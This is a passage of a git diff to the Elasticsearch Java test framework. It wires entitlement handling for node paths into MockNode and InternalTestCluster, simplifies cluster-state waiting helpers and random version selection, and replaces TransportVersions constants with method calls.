add(value); diff --git a/test/framework/src/main/java/org/elasticsearch/node/MockNode.java b/test/framework/src/main/java/org/elasticsearch/node/MockNode.java index 9a99b5c881941..3837aa4b426d4 100644 --- a/test/framework/src/main/java/org/elasticsearch/node/MockNode.java +++ b/test/framework/src/main/java/org/elasticsearch/node/MockNode.java @@ -24,6 +24,7 @@ import org.elasticsearch.common.util.MockBigArrays; import org.elasticsearch.common.util.MockPageCacheRecycler; import org.elasticsearch.common.util.PageCacheRecycler; +import org.elasticsearch.core.IOUtils; import org.elasticsearch.env.Environment; import org.elasticsearch.http.HttpServerTransport; import org.elasticsearch.indices.ExecutorSelector; @@ -53,10 +54,12 @@ import org.elasticsearch.transport.TransportService; import org.elasticsearch.transport.TransportSettings; +import java.io.Closeable; import java.nio.file.Path; import java.util.Collection; import java.util.Collections; import java.util.Map; +import java.util.concurrent.TimeUnit; import java.util.function.Function; import java.util.function.LongSupplier; @@ -232,40 +235,37 @@ protected HttpServerTransport newHttpTransport(PluginsService pluginsService, Ne private final Collection> classpathPlugins; + // handle for temporarily entitled node paths for this node; these will be removed on close. + private final Closeable entitledNodePaths; + public MockNode(final Settings settings, final Collection> classpathPlugins) { - this(settings, classpathPlugins, true); + this(settings, classpathPlugins, true, () -> {}); } public MockNode( final Settings settings, final Collection> classpathPlugins, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { - this(settings, classpathPlugins, null, forbidPrivateIndexSettings); + this(settings, classpathPlugins, null, forbidPrivateIndexSettings, entitledNodePaths); } public MockNode( final Settings settings, final Collection> classpathPlugins, final Path configPath, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { - this( - InternalSettingsPreparer.prepareEnvironment( - Settings.builder().put(TransportSettings.PORT.getKey(), ESTestCase.getPortRange()).put(settings).build(), - Collections.emptyMap(), - configPath, - () -> "mock_ node" - ), - classpathPlugins, - forbidPrivateIndexSettings - ); + this(prepareEnvironment(settings, configPath), classpathPlugins, forbidPrivateIndexSettings, entitledNodePaths); } private MockNode( final Environment environment, final Collection> classpathPlugins, - final boolean forbidPrivateIndexSettings + final boolean forbidPrivateIndexSettings, + final Closeable entitledNodePaths ) { super(NodeConstruction.prepareConstruction(environment, null, new MockServiceProvider() { @@ -276,6 +276,25 @@ PluginsService newPluginService(Environment environment, PluginsLoader pluginsLo }, forbidPrivateIndexSettings)); this.classpathPlugins = classpathPlugins; + this.entitledNodePaths = entitledNodePaths; + } + + private static Environment prepareEnvironment(final Settings settings, final Path configPath) { + return InternalSettingsPreparer.prepareEnvironment( + Settings.builder().put(TransportSettings.PORT.getKey(), ESTestCase.getPortRange()).put(settings).build(), + Collections.emptyMap(), + configPath, + () -> "mock_ node" + ); + } + + @Override + public synchronized boolean awaitClose(long timeout, TimeUnit timeUnit) throws InterruptedException { + try { + return super.awaitClose(timeout, timeUnit); + } finally { + IOUtils.closeWhileHandlingException(entitledNodePaths); + } } /** diff --git a/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java b/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java index 43589ae606c28..bacde646260c1 100644 --- a/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java +++ b/test/framework/src/main/java/org/elasticsearch/search/DummyQueryBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.index.query.AbstractQueryBuilder; @@ -69,6 +68,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java b/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java index 5e451e2e79f10..0d89d40d982c5 100644 --- a/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/search/aggregations/AggregatorTestCase.java @@ -52,7 +52,6 @@ import org.apache.lucene.util.NumericUtils; import org.apache.lucene.util.packed.PackedInts; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.action.search.SearchRequest; import org.elasticsearch.cluster.metadata.IndexMetadata; @@ -1619,7 +1618,7 @@ protected void doWriteTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java b/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java index 63e77cfdc4523..185a0494183b3 100644 --- a/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/snapshots/AbstractSnapshotIntegTestCase.java @@ -557,7 +557,7 @@ protected void addBwCFailedSnapshot(String repoName, String snapshotName, Map wait for [{}] deletions to show up in the cluster state", count); awaitClusterState(state -> SnapshotDeletionsInProgress.get(state).getEntries().size() == count); } @@ -569,7 +569,6 @@ protected void awaitNoMoreRunningOperations() throws Exception { protected void awaitNoMoreRunningOperations(String viaNode) throws Exception { logger.info("--> verify no more operations in the cluster state"); awaitClusterState( - logger, viaNode, state -> SnapshotsInProgress.get(state).isEmpty() && SnapshotDeletionsInProgress.get(state).hasDeletionsInProgress() == false ); @@ -604,13 +603,13 @@ public static ActionFuture startFullSnapshot( .execute(); } - protected void awaitNumberOfSnapshotsInProgress(int count) throws Exception { + protected void awaitNumberOfSnapshotsInProgress(int count) { awaitNumberOfSnapshotsInProgress(logger, count); } - public static void awaitNumberOfSnapshotsInProgress(Logger logger, int count) throws Exception { + public static void awaitNumberOfSnapshotsInProgress(Logger logger, int count) { logger.info("--> wait for [{}] snapshots to show up in the cluster state", count); - awaitClusterState(logger, state -> SnapshotsInProgress.get(state).count() == count); + awaitClusterState(state -> SnapshotsInProgress.get(state).count() == count); } protected SnapshotInfo assertSuccessful(ActionFuture future) throws Exception { diff --git a/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java index b4f91f68b8bb7..8e2098f361b0b 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/AbstractMultiClustersTestCase.java @@ -127,7 +127,8 @@ public final void startClusters() throws Exception { 0, clusterName + "-", mockPlugins, - Function.identity() + Function.identity(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); try { cluster.beforeTest(random()); diff --git a/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java index d83cab3c7c205..5ecb2f24acb32 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/AbstractSearchCancellationTestCase.java @@ -26,7 +26,7 @@ import org.elasticsearch.rest.RestStatus; import org.elasticsearch.script.MockScriptPlugin; import org.elasticsearch.search.SearchService; -import org.elasticsearch.search.internal.ReaderContext; +import org.elasticsearch.search.internal.SearchContext; import org.elasticsearch.search.lookup.LeafStoredFieldsLookup; import org.elasticsearch.tasks.TaskInfo; import org.junit.BeforeClass; @@ -279,10 +279,10 @@ protected List initSearchShardBlockingPlugin() { } public static class SearchShardBlockingPlugin extends Plugin { - private final AtomicReference> runOnNewReaderContext = new AtomicReference<>(); + private final AtomicReference> runOnPreQueryPhase = new AtomicReference<>(); - public void setRunOnNewReaderContext(Consumer consumer) { - runOnNewReaderContext.set(consumer); + public void setRunOnPreQueryPhase(Consumer consumer) { + runOnPreQueryPhase.set(consumer); } @Override @@ -290,9 +290,9 @@ public void onIndexModule(IndexModule indexModule) { super.onIndexModule(indexModule); indexModule.addSearchOperationListener(new SearchOperationListener() { @Override - public void onNewReaderContext(ReaderContext c) { - if (runOnNewReaderContext.get() != null) { - runOnNewReaderContext.get().accept(c); + public void onPreQueryPhase(SearchContext c) { + if (runOnPreQueryPhase.get() != null) { + runOnPreQueryPhase.get().accept(c); } } }); diff --git a/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java b/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java index 1cd0d0ddc4cd2..77042953b6993 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java +++ b/test/framework/src/main/java/org/elasticsearch/test/BWCVersions.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import java.util.NavigableSet; @@ -18,7 +17,7 @@ public final class BWCVersions { private BWCVersions() {} public static NavigableSet getAllBWCVersions() { - return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersions.MINIMUM_COMPATIBLE, true); + return TransportVersionUtils.allReleasedVersions().tailSet(TransportVersion.minimumCompatible(), true); } public static final NavigableSet DEFAULT_BWC_VERSIONS = getAllBWCVersions(); diff --git a/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java b/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java index e0e7505191da9..e6ed4b489048a 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ClusterServiceUtils.java @@ -8,17 +8,14 @@ */ package org.elasticsearch.test; -import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.util.Throwables; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; -import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.action.support.SubscribableListener; import org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.ClusterStateListener; -import org.elasticsearch.cluster.ClusterStateObserver; import org.elasticsearch.cluster.ClusterStatePublicationEvent; import org.elasticsearch.cluster.ClusterStateUpdateTask; import org.elasticsearch.cluster.NodeConnectionsService; @@ -37,14 +34,12 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.TimeValue; -import org.elasticsearch.node.NodeClosedException; import org.elasticsearch.tasks.TaskManager; import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.threadpool.ThreadPool; import java.util.Collections; import java.util.concurrent.CountDownLatch; -import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Predicate; @@ -219,33 +214,8 @@ public static void setAllElapsedMillis(ClusterStatePublicationEvent clusterState clusterStatePublicationEvent.setMasterApplyElapsedMillis(0L); } - public static void awaitClusterState(Logger logger, Predicate statePredicate, ClusterService clusterService) - throws Exception { - final PlainActionFuture future = new PlainActionFuture<>(); - ClusterStateObserver.waitForState( - clusterService, - clusterService.getClusterApplierService().threadPool().getThreadContext(), - new ClusterStateObserver.Listener() { - @Override - public void onNewClusterState(ClusterState state) { - future.onResponse(null); - } - - @Override - public void onClusterServiceClose() { - future.onFailure(new NodeClosedException(clusterService.localNode())); - } - - @Override - public void onTimeout(TimeValue timeout) { - assert false : "onTimeout called with no timeout set"; - } - }, - statePredicate, - null, - logger - ); - future.get(30L, TimeUnit.SECONDS); + public static void awaitClusterState(Predicate statePredicate, ClusterService clusterService) { + ESTestCase.safeAwait(addTemporaryStateListener(clusterService, statePredicate, TimeValue.THIRTY_SECONDS), TimeValue.THIRTY_SECONDS); } public static void awaitNoPendingTasks(ClusterService clusterService) { diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java index afbabe110aa4e..1bf5e7d307777 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ESIntegTestCase.java @@ -17,7 +17,6 @@ import com.carrotsearch.randomizedtesting.generators.RandomPicks; import org.apache.http.HttpHost; -import org.apache.logging.log4j.Logger; import org.apache.lucene.search.Sort; import org.apache.lucene.search.TotalHits; import org.apache.lucene.tests.util.LuceneTestCase; @@ -548,6 +547,7 @@ private TestCluster buildAndPutCluster(Scope currentClusterScope, long seed) thr // close the previous one and create a new one if (testCluster != null) { IOUtils.closeWhileHandlingException(testCluster::close); + TEST_ENTITLEMENTS.revokeAllEntitledNodePaths(); } testCluster = buildTestCluster(currentClusterScope, seed); } @@ -1206,16 +1206,12 @@ public static PendingClusterTasksResponse getClusterPendingTasks(Client client) } } - protected void awaitClusterState(Predicate statePredicate) throws Exception { - awaitClusterState(logger, internalCluster().getMasterName(), statePredicate); + public static void awaitClusterState(Predicate statePredicate) { + awaitClusterState(internalCluster().getMasterName(), statePredicate); } - public static void awaitClusterState(Logger logger, Predicate statePredicate) throws Exception { - awaitClusterState(logger, internalCluster().getMasterName(), statePredicate); - } - - public static void awaitClusterState(Logger logger, String viaNode, Predicate statePredicate) throws Exception { - ClusterServiceUtils.awaitClusterState(logger, statePredicate, internalCluster().getInstance(ClusterService.class, viaNode)); + public static void awaitClusterState(String viaNode, Predicate statePredicate) { + ClusterServiceUtils.awaitClusterState(statePredicate, internalCluster().getInstance(ClusterService.class, viaNode)); } public static String getNodeId(String nodeName) { @@ -2326,7 +2322,8 @@ protected TestCluster buildTestCluster(Scope scope, long seed) throws IOExceptio getClientWrapper(), forbidPrivateIndexSettings(), forceSingleDataPath(), - autoManageVotingExclusions() + autoManageVotingExclusions(), + TEST_ENTITLEMENTS::addEntitledNodePaths ); } diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java index 7ebc5765bda63..53214590e4a60 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ESSingleNodeTestCase.java @@ -288,7 +288,7 @@ private Node newNode() { plugins.add(ConcurrentSearchTestPlugin.class); } plugins.add(MockScriptService.TestPlugin.class); - Node node = new MockNode(settings, plugins, forbidPrivateIndexSettings()); + Node node = new MockNode(settings, plugins, forbidPrivateIndexSettings(), TEST_ENTITLEMENTS.addEntitledNodePaths(settings, null)); try { node.start(); } catch (NodeValidationException e) { diff --git a/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java index 7183a43c6f731..add06432b4faa 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/ESTestCase.java @@ -111,6 +111,7 @@ import org.elasticsearch.core.SuppressForbidden; import org.elasticsearch.core.TimeValue; import org.elasticsearch.core.Tuple; +import org.elasticsearch.entitlement.bootstrap.TestEntitlementsRule; import org.elasticsearch.env.Environment; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.env.TestEnvironment; @@ -158,12 +159,18 @@ import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; +import org.junit.ClassRule; import org.junit.Rule; import org.junit.internal.AssumptionViolatedException; import org.junit.rules.RuleChain; import java.io.IOException; import java.io.InputStream; +import java.lang.annotation.ElementType; +import java.lang.annotation.Inherited; +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; import java.lang.invoke.MethodHandles; import java.math.BigInteger; import java.net.InetAddress; @@ -492,6 +499,35 @@ protected void afterIfFailed(List errors) {} /** called after a test is finished, but only if successful */ protected void afterIfSuccessful() throws Exception {} + /** + * Marks a test suite or a test method that should run without checking for entitlements. + */ + @Retention(RetentionPolicy.RUNTIME) + @Target(ElementType.TYPE) + @Inherited + public @interface WithoutEntitlements { + } + + /** + * Marks a test suite or a test method that enforce entitlements on the test code itself. + * Useful for testing the enforcement of entitlements; for any other test cases, this probably isn't what you want. + */ + @Retention(RetentionPolicy.RUNTIME) + @Target(ElementType.TYPE) + @Inherited + public @interface WithEntitlementsOnTestCode { + } + + @Retention(RetentionPolicy.RUNTIME) + @Target(ElementType.TYPE) + @Inherited + public @interface EntitledTestPackages { + String[] value(); + } + + @ClassRule + public static final TestEntitlementsRule TEST_ENTITLEMENTS = new TestEntitlementsRule(); + // setup mock filesystems for this test run. we change PathUtils // so that all accesses are plumbed thru any mock wrappers diff --git a/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java index 5feb79c16bb24..38cccb4070349 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/InternalAggregationTestCase.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.io.stream.NamedWriteableRegistry; import org.elasticsearch.common.io.stream.StreamOutput; @@ -425,7 +424,7 @@ public BucketCardinality bucketCardinality() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java b/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java index 904e53d9af418..453cddd504364 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java +++ b/test/framework/src/main/java/org/elasticsearch/test/InternalTestCluster.java @@ -179,6 +179,14 @@ */ public final class InternalTestCluster extends TestCluster { + /** + * Temporarily adds node paths based entitlements based on a node's {@code settings} and {@code configPath} + * until the returned handle is closed. + */ + public interface EntitledNodePathsProvider { + Closeable addEntitledNodePaths(Settings settings, Path configPath); + } + private static final Logger logger = LogManager.getLogger(InternalTestCluster.class); private static final Predicate DATA_NODE_PREDICATE = new Predicate<>() { @@ -278,6 +286,8 @@ public String toString() { // index of node to bootstrap as master, or BOOTSTRAP_MASTER_NODE_INDEX_AUTO or BOOTSTRAP_MASTER_NODE_INDEX_DONE private int bootstrapMasterNodeIndex = BOOTSTRAP_MASTER_NODE_INDEX_AUTO; + private final EntitledNodePathsProvider entitledNodePathsProvider; + public InternalTestCluster( final long clusterSeed, final Path baseDir, @@ -290,7 +300,8 @@ public InternalTestCluster( final int numClientNodes, final String nodePrefix, final Collection> mockPlugins, - final Function clientWrapper + final Function clientWrapper, + EntitledNodePathsProvider entitledNodePathsProvider ) { this( clusterSeed, @@ -307,7 +318,8 @@ public InternalTestCluster( clientWrapper, true, false, - true + true, + entitledNodePathsProvider ); } @@ -326,7 +338,8 @@ public InternalTestCluster( final Function clientWrapper, final boolean forbidPrivateIndexSettings, final boolean forceSingleDataPath, - final boolean autoManageVotingExclusions + final boolean autoManageVotingExclusions, + final EntitledNodePathsProvider entitledNodePathsProvider ) { super(clusterSeed); this.autoManageMasterNodes = autoManageMasterNodes; @@ -335,6 +348,7 @@ public InternalTestCluster( this.baseDir = baseDir; this.clusterName = clusterName; this.autoManageVotingExclusions = autoManageVotingExclusions; + this.entitledNodePathsProvider = entitledNodePathsProvider; if (minNumDataNodes < 0 || maxNumDataNodes < 0) { throw new IllegalArgumentException("minimum and maximum number of data nodes must be >= 0"); } @@ -783,7 +797,14 @@ private synchronized NodeAndClient buildNode(int nodeId, Settings settings, bool // we clone this here since in the case of a node restart we might need it again secureSettings = ((MockSecureSettings) secureSettings).clone(); } - MockNode node = new MockNode(settings, plugins, nodeConfigurationSource.nodeConfigPath(nodeId), forbidPrivateIndexSettings); + Path configPath = nodeConfigurationSource.nodeConfigPath(nodeId); + MockNode node = new MockNode( + settings, + plugins, + configPath, + forbidPrivateIndexSettings, + entitledNodePathsProvider.addEntitledNodePaths(settings, configPath) + ); node.injector().getInstance(TransportService.class).addLifecycleListener(new LifecycleListener() { @Override public void afterStart() { @@ -1058,7 +1079,12 @@ private void recreateNode(final Settings newSettings, final Runnable onTransport .put(NodeEnvironment.NODE_ID_SEED_SETTING.getKey(), newIdSeed) .build(); Collection> plugins = node.getClasspathPlugins(); - node = new MockNode(finalSettings, plugins, forbidPrivateIndexSettings); + node = new MockNode( + finalSettings, + plugins, + forbidPrivateIndexSettings, + entitledNodePathsProvider.addEntitledNodePaths(finalSettings, null) + ); node.injector().getInstance(TransportService.class).addLifecycleListener(new LifecycleListener() { @Override public void afterStart() { @@ -2038,7 +2064,7 @@ public String getMasterName(@Nullable String viaNode) { throw new AssertionError("Unable to get master name, no node found"); } try { - ClusterServiceUtils.awaitClusterState(logger, state -> state.nodes().getMasterNode() != null, clusterService(viaNode)); + ClusterServiceUtils.awaitClusterState(state -> state.nodes().getMasterNode() != null, clusterService(viaNode)); final ClusterState state = client(viaNode).admin().cluster().prepareState(TEST_REQUEST_TIMEOUT).setLocal(true).get().getState(); final DiscoveryNode masterNode = state.nodes().getMasterNode(); if (masterNode == null) { diff --git a/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java index 9c7114425b8db..1f68ff19f6b2b 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/TransportVersionUtils.java @@ -10,7 +10,6 @@ package org.elasticsearch.test; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.core.Nullable; import java.util.Collections; @@ -40,7 +39,7 @@ public static TransportVersion getFirstVersion() { /** Returns a random {@link TransportVersion} from all available versions. */ public static TransportVersion randomVersion() { - return VersionUtils.randomFrom(random(), allReleasedVersions(), TransportVersion::fromId); + return VersionUtils.randomFrom(random(), allReleasedVersions()); } /** Returns a random {@link TransportVersion} from all available versions without the ignore set */ @@ -50,7 +49,7 @@ public static TransportVersion randomVersion(Set ignore) { /** Returns a random {@link TransportVersion} from all available versions. */ public static TransportVersion randomVersion(Random random) { - return VersionUtils.randomFrom(random, allReleasedVersions(), TransportVersion::fromId); + return VersionUtils.randomFrom(random, allReleasedVersions()); } /** Returns a random {@link TransportVersion} between minVersion and maxVersion (inclusive). */ @@ -77,7 +76,7 @@ public static TransportVersion randomVersionBetween( versions = versions.headSet(maxVersion, true); } - return VersionUtils.randomFrom(random, versions, TransportVersion::fromId); + return VersionUtils.randomFrom(random, versions); } public static TransportVersion getPreviousVersion() { @@ -113,6 +112,6 @@ public static TransportVersion getNextVersion(TransportVersion version, boolean /** Returns a random {@code TransportVersion} that is compatible with {@link TransportVersion#current()} */ public static TransportVersion randomCompatibleVersion(Random random) { - return randomVersionBetween(random, TransportVersions.MINIMUM_COMPATIBLE, TransportVersion.current()); + return randomVersionBetween(random, TransportVersion.minimumCompatible(), TransportVersion.current()); } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java index 311f032088f74..a9953f2208a75 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/VersionUtils.java @@ -9,7 +9,7 @@ package org.elasticsearch.test; -import com.carrotsearch.randomizedtesting.generators.RandomNumbers; +import com.carrotsearch.randomizedtesting.generators.RandomPicks; import org.elasticsearch.Build; import org.elasticsearch.Version; @@ -21,7 +21,6 @@ import java.util.NavigableSet; import java.util.Random; import java.util.TreeSet; -import java.util.function.IntFunction; /** Utilities for selecting versions in tests */ public class VersionUtils { @@ -77,7 +76,7 @@ public static Version getFirstVersion() { /** Returns a random {@link Version} from all available versions. */ public static Version randomVersion(Random random) { - return randomFrom(random, ALL_VERSIONS, Version::fromId); + return randomFrom(random, ALL_VERSIONS); } /** Returns a random {@link Version} from all available versions, that is compatible with the given version. */ @@ -106,7 +105,7 @@ public static Version randomVersionBetween(Random random, @Nullable Version minV versions = versions.headSet(maxVersion, true); } - return randomFrom(random, versions, Version::fromId); + return randomFrom(random, versions); } /** Returns the maximum {@link Version} that is compatible with the given version. */ @@ -114,16 +113,7 @@ public static Version maxCompatibleVersion(Version version) { return ALL_VERSIONS.tailSet(version, true).descendingSet().stream().filter(version::isCompatible).findFirst().orElseThrow(); } - public static > T randomFrom(Random random, NavigableSet set, IntFunction ctor) { - // get the first and last id, pick a random id in the middle, then find that id in the set in O(nlogn) time - // this assumes the id numbers are reasonably evenly distributed in the set - assert set.isEmpty() == false; - int lowest = set.getFirst().id(); - int highest = set.getLast().id(); - - T randomId = ctor.apply(RandomNumbers.randomIntBetween(random, lowest, highest)); - // try to find the id below, then the id above. We're just looking for *some* item in the set that is close to randomId - T found = set.floor(randomId); - return found != null ? found : set.ceiling(randomId); + public static > T randomFrom(Random random, NavigableSet set) { + return RandomPicks.randomFrom(random, set); } } diff --git a/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java b/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java index 5bf20b18abc72..db1aaad52bdcb 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java +++ b/test/framework/src/main/java/org/elasticsearch/test/index/IndexVersionUtils.java @@ -45,12 +45,12 @@ public static IndexVersion getLowestWriteCompatibleVersion() { /** Returns a random {@link IndexVersion} from all available versions. */ public static IndexVersion randomVersion() { - return VersionUtils.randomFrom(random(), ALL_VERSIONS, IndexVersion::fromId); + return VersionUtils.randomFrom(random(), ALL_VERSIONS); } /** Returns a random {@link IndexVersion} from all versions that can be written to. */ public static IndexVersion randomWriteVersion() { - return VersionUtils.randomFrom(random(), ALL_WRITE_VERSIONS, IndexVersion::fromId); + return VersionUtils.randomFrom(random(), ALL_WRITE_VERSIONS); } /** Returns a random {@link IndexVersion} from all available versions without the ignore set */ @@ -78,7 +78,7 @@ public static IndexVersion randomVersionBetween(Random random, @Nullable IndexVe versions = versions.headSet(maxVersion, true); } - return VersionUtils.randomFrom(random, versions, IndexVersion::fromId); + return VersionUtils.randomFrom(random, versions); } public static IndexVersion getPreviousVersion() { diff --git a/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java b/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java index c187c9b822a86..73ae9a39bc076 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java +++ b/test/framework/src/main/java/org/elasticsearch/test/junit/listeners/ReproduceInfoPrinter.java @@ -189,7 +189,14 @@ private ReproduceErrorMessageBuilder appendESProperties() { appendOpt("tests.locale", Locale.getDefault().toLanguageTag()); appendOpt("tests.timezone", TimeZone.getDefault().getID()); appendOpt("tests.distribution", System.getProperty("tests.distribution")); - appendOpt("runtime.java", Integer.toString(Runtime.version().feature())); + if (Runtime.version().build().isPresent() + && ("ea".equalsIgnoreCase(Runtime.version().pre().orElse("")) + || ("rc".equalsIgnoreCase(Runtime.version().pre().orElse(""))))) { + appendOpt("runtime.java", Runtime.version().feature() + "-pre"); + appendOpt("runtime.java.build", Integer.toString(Runtime.version().build().get())); + } else { + appendOpt("runtime.java", Integer.toString(Runtime.version().feature())); + } appendOpt(ESTestCase.FIPS_SYSPROP, System.getProperty(ESTestCase.FIPS_SYSPROP)); return this; } diff --git a/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java b/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java index 04c2ff20627a7..ef72094c82f1e 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java +++ b/test/framework/src/main/java/org/elasticsearch/test/rest/ESRestTestCase.java @@ -30,7 +30,6 @@ import org.apache.logging.log4j.Logger; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.action.admin.cluster.node.tasks.list.TransportListTasksAction; import org.elasticsearch.action.admin.cluster.repositories.put.PutRepositoryRequest; @@ -1227,7 +1226,7 @@ protected static void wipeAllIndices(boolean preserveSecurityIndices) throws IOE try { // remove all indices except some history indices which can pop up after deleting all data streams but shouldn't interfere final List indexPatterns = new ArrayList<>( - List.of("*", "-.ds-ilm-history-*", "-.ds-.slm-history-*", "-.ds-.watcher-history-*") + List.of("*", "-.ds-ilm-history-*", "-.ds-.slm-history-*", "-.ds-.watcher-history-*", "-.ds-.triggered_watches-*") ); if (preserveSecurityIndices) { indexPatterns.add("-.security-*"); @@ -2529,7 +2528,7 @@ protected static TransportVersion minimumTransportVersion() throws IOException { var transportVersion = getTransportVersionWithFallback( objectPath.evaluate("nodes." + id + ".version"), objectPath.evaluate("nodes." + id + ".transport_version"), - () -> TransportVersions.MINIMUM_COMPATIBLE + () -> TransportVersion.minimumCompatible() ); if (minTransportVersion == null || minTransportVersion.after(transportVersion)) { minTransportVersion = transportVersion; diff --git a/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java b/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java index 3cf9255f19803..e55387a715d97 100644 --- a/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java +++ b/test/framework/src/main/java/org/elasticsearch/test/rest/FakeRestRequest.java @@ -117,9 +117,19 @@ public HttpRequest removeHeader(String header) { return new FakeHttpRequest(method, uri, body, filteredHeaders, inboundException); } + public int contentLength() { + return switch (body) { + case HttpBody.Full f -> f.bytes().length(); + case HttpBody.Stream s -> { + var len = header("Content-Length"); + yield len == null ? 0 : 